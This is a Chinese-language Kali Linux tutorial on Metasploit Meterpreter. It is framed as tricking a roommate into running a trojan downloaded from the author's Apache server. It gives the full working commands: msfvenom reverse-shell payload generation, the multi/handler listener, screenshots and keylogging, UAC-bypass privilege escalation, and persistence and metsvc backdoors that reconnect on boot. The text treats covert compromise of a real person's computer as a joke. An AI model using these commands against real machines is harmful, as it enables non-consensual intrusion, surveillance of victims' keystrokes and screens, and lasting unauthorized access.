卡利渗透 - 基础知识

渗透之meterpreter

模拟场景：小明是我室友，整天游戏人生，浑浑噩噩，前途迷茫，每次上课交作业都要看我的，于是我开启了apche服务器，给他下载作业（别问我为什么不用QQ传，因为要装逼！），他无意中看到我的一些其他软件，并也一起打包下载了，并且运行了一个*.exe程序，嘿嘿，从此他的电脑上便再无秘密可言。

 

0x1.实验环境

VMware

kali（linux）系统 kali ip:192.168.127.128

windows 7专业版

kali镜像官方下载地址->>https://www.kali.org/downloads/

0x2.开始实验

0x2.1.终端进入msfconsole控制台

输入->>msfconsole      回车即可

生成木马程序

输入->>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.127.128 LPORT=4444 -f exe > 1.exe

提示：命令中的ip地址为kali IP地址，端口号可自行设定（尽量设置为不常用端口号），1.exe为木马程序，名字随意，由.exe结尾即可。

开启一个新终端

开启apache服务，将默认主页删除并复制1.exe文件到该目录下

输入->>service apache2 start

->>rm /var/www/html/*

->>cp 1.exe /var/www/html/

win7在同一局域网内主机就可以访问到：http://192.168.127.128:80

win7点击1.exe文件即可下载，现在我们将该文件下载下来放到桌面上运行。

回到kali的msf上，使用监听模块，设置一些参数，输入options即可查看需要设置的参数。

输入->>use exploit/multi/handler

->>set payload windows/meterpreter/reverse_tcp

->>set LHost 192.168.127.128

->>set LPORT 4444

提示：IP为kali IP地址，端口为之前生成1.exe时端口，默认端口为4444

执行exploit即可连上win7了

查看当前权限

输入命令->>getuid

显示系统权限，那就可以做很多事情了。

可能做到这里就只有用户权限了，那也是没关系的！

可以先试试获取远端桌面截屏，记录键盘等

截屏操作

输入->>screenshot

还有就是键盘记录，你输了什么我都知道，哈哈哈。

如果不是system权限或administrator权限就需要提权。

shell命令打开win7终端

提权

说明：本来我第一次做的时候拿到的也是用户权限，找了一些资料，试了几种方法均未成功，后来看到一篇win7提权的，终于成功了！

以exploit/windows/local/bypassuac模块为例

该模块在windows 32位和64位下都有效。

msf > use exploit/windows/local/bypassuac
 ->> set session 2
 ->> exploit
用sessions命令就可以看到自己的编号了，我这里是2
　
植入后门　
提升权限完第一件事就是留后门了。
现在只不过是放了一个马而已，下次启动就不运行了，这怎么行！所以我们得留个后门啊！
输入->>run persistence -X -i 5 -p 4444 -r 192.168.127.128

-X为开机自启 -i为反向连接
metsvc攻击
开启一个会话服务
输入->>run metsvc

win7上已经有了。

 

参考来自-》》https://xz.aliyun.com/t/2536#toc-2

-》》https://paper.seebug.org/29/

提权文章使用的是->>https://www.cnblogs.com/wh4am1/p/6602650.html方法，可以尝试其他方法进行提权哦！